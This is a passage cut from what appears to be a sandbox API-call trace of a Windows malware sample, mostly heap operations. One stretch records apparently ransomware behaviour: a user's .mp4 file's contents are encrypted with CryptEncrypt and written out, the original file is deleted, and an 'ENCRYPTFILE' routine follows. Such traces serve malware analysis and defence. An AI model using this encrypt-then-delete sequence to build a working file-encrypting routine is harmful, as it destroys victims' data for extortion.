hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0122.228] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2820, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2820*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.230] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.230] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.231] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0122.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.231] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.248] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabe0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.249] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x5c27, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x5c30) returned 1 [0122.249] CharLowerBuffW (in: lpsz="byte[23601]", cchLength=0xb | out: lpsz="byte[23601]") returned 0xb [0122.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.250] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.250] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49bb4a0*, pdwDataLen=0x144e790*=0x5c27, dwBufLen=0x5c30 | out: pbData=0x49bb4a0*, pdwDataLen=0x144e790*=0x5c30) returned 1 [0122.250] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.251] WriteFile (in: hFile=0x258, lpBuffer=0x49d81c8*, nNumberOfBytesToWrite=0x5c30, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49d81c8*, lpNumberOfBytesWritten=0x144f194*=0x5c30, lpOverlapped=0x0) returned 1 [0122.253] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0122.253] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca988, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.253] CryptDestroyKey (hKey=0x41ac600) returned 1 [0122.253] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.253] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.253] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.253] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.253] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.253] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.253] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.253] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.254] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0122.254] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.254] FreeLibrary (hLibModule=0x756e0000) returned 1 [0122.254] CloseHandle (hObject=0x2a0) returned 1 [0122.254] CloseHandle (hObject=0x258) returned 1 [0122.301] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4", lpFilePart=0x0) returned 0x28 [0122.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0122.301] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\bub qc_slq8o.mp4")) returned 0x20 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0122.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0122.302] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a228cf0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x27856890, ftLastAccessTime.dwHighDateTime=0x1d5e7e1, ftLastWriteTime.dwLowDateTime=0x27856890, ftLastWriteTime.dwHighDateTime=0x1d5e7e1, nFileSizeHigh=0x0, nFileSizeLow=0x5c27, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bUb qc_SLq8O.mp4", cAlternateFileName="BUBQC_~1.MP4")) returned 0x41ac140 [0122.302] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\bub qc_slq8o.mp4")) returned 1 [0122.310] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a228cf0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x27856890, ftLastAccessTime.dwHighDateTime=0x1d5e7e1, ftLastWriteTime.dwLowDateTime=0x27856890, ftLastWriteTime.dwHighDateTime=0x1d5e7e1, nFileSizeHigh=0x0, nFileSizeLow=0x5c27, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bUb qc_SLq8O.mp4", cAlternateFileName="BUBQC_~1.MP4")) returned 0 [0122.310] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0122.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0122.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0122.311] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0122.311] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9d90 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0122.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0122.311] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.311] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.311] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0122.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0122.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0122.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0122.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: 